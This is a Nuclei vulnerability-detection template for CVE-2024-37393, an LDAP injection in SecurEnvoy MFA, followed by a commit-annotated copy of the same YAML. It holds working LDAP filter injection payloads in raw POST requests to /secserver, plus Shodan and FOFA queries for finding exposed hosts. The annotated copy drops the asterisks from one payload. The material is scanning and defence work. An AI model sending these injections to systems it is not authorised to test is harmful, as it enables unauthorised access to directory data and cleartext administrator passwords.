nuclei-templates/http/cves/2024/CVE-2024-37393.yaml

id: CVE-2024-37393
info:
  name: SecurEnvoy Two Factor Authentication - LDAP Injection
  author: securityforeveryone
  severity: critical
  description: |
    Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.
  reference:
    - https://www.tenable.com/cve/CVE-2024-37393
    - https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393
    - https://securenvoy.com
  metadata:
    verified: true
    shodan-query: title:"SecurEnvoy"
    fofa-query: title="SecurEnvoy"
  tags: cve,cve2024,securenvoy,ldap

variables:
  userid: "{{to_lower(rand_base(20))}}"

http:
  - raw:
      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:{{userid}})(sAMAccountName=*
        MEMBEROF:Domain Users

      - |
        POST /secserver/? HTTP/2
        Host: {{Hostname}}

        FLAG=DESKTOP
        1
        STATUS:INIT
        USERID:*)(sAMAccountName=*
        MEMBEROF:Domain Users

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'Error checking Group')"
          - "status_code_1 == 200"
          - "contains(body_2, 'GETPASSCODE')"
          - "status_code_2 == 200"
        condition: and
# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950
cve-2024-37393 add 2024-06-11 10:28:44 +00:00			`id: CVE-2024-37393`
			`info:`
minor update 2024-06-13 08:24:39 +00:00			`name: SecurEnvoy Two Factor Authentication - LDAP Injection`
			`author: securityforeveryone`
cve-2024-37393 add 2024-06-11 10:28:44 +00:00			`severity: critical`
			`description: \|`
			`Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.`
			`reference:`
			`- https://www.tenable.com/cve/CVE-2024-37393`
			`- https://www.optistream.io/blogs/tech/securenvoy-cve-2024-37393`
			`- https://securenvoy.com`
minor update 2024-06-13 08:24:39 +00:00			`metadata:`
			`verified: true`
			`shodan-query: title:"SecurEnvoy"`
			`fofa-query: title="SecurEnvoy"`
			`tags: cve,cve2024,securenvoy,ldap`

cve-2024-37393 add 2024-06-11 10:28:44 +00:00			`variables:`
			`userid: "{{to_lower(rand_base(20))}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /secserver/? HTTP/2`
			`Host: {{Hostname}}`

			`FLAG=DESKTOP`
			`1`
			`STATUS:INIT`
			`USERID:{{userid}})(sAMAccountName=*`
			`MEMBEROF:Domain Users`

			`- \|`
			`POST /secserver/? HTTP/2`
			`Host: {{Hostname}}`

			`FLAG=DESKTOP`
			`1`
			`STATUS:INIT`
			`USERID:)(sAMAccountName=`
			`MEMBEROF:Domain Users`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "contains(body_1, 'Error checking Group')"`
			`- "status_code_1 == 200"`
			`- "contains(body_2, 'GETPASSCODE')"`
			`- "status_code_2 == 200"`
			`condition: and`
Auto Template Signing [Thu Jun 13 16:55:46 UTC 2024] :robot: 2024-06-13 16:55:46 +00:00			`# digest: 490a0046304402207956ded5a27d1c12f6487316e5b14bb02bb6977fa43bc048e1a21ac9010125480220063cb9fbb223d773537cc685ba85640b97d10412c97695ac541f5ecbac760bbd:922c64590222798bb761d5b6d8e72950`